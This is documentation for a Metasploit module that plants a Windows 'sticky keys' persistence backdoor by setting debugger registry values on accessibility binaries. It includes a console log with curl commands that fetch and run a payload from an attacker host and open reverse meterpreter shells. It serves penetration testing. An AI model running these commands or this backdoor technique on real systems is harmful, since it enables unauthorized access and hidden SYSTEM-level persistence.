metasploit-gs/documentation/modules/exploit/windows/persistence/accessibility_features_debugger.md

## Vulnerable Application

This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
for certain executables.

The module options allow for this hack to be applied to:

- SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),
- UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),
- OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),
- DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P),
- NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),
- ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).

Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
to the target prior to running the module.

## Verification Steps

1. Get session on target with admin/system privs
2. `use exploit/windows/persistence/accessibility_features_debugger`
3. `set payload <payload>`
4. `set session <session>`
5. `exploit`
6. Use the key combo to trigger the payload
7. Get a session

## Options

### BINARY

The target binary to add the exploit to. Defaults to `SETHC`.

Options are:

- SETHC
- UTILMAN
- OSK
- DISP

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49842) at 2025-12-05 06:34:00 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/acessibility_features_debugger 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/acessibility_features_debugger) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/acessibility_features_debugger) > set session 1
session => 1
msf exploit(windows/persistence/acessibility_features_debugger) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/acessibility_features_debugger) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload pathname: C:\Users\windows\AppData\Local\Temp\HQagFFAsQ.exe
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times.
[-] Exploit failed: NoMethodError undefined method `gsub' for nil

msf exploit(windows/persistence/acessibility_features_debugger) > rexploit
[*] Reloading module...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/acessibility_features_debugger) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload pathname: C:\Users\windows\AppData\Local\Temp\vEmsvwn.exe
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251205.3717/WIN10PROLICENSE_20251205.3717.rc
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49843) at 2025-12-05 06:37:30 -0500

msf exploit(windows/persistence/acessibility_features_debugger) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
```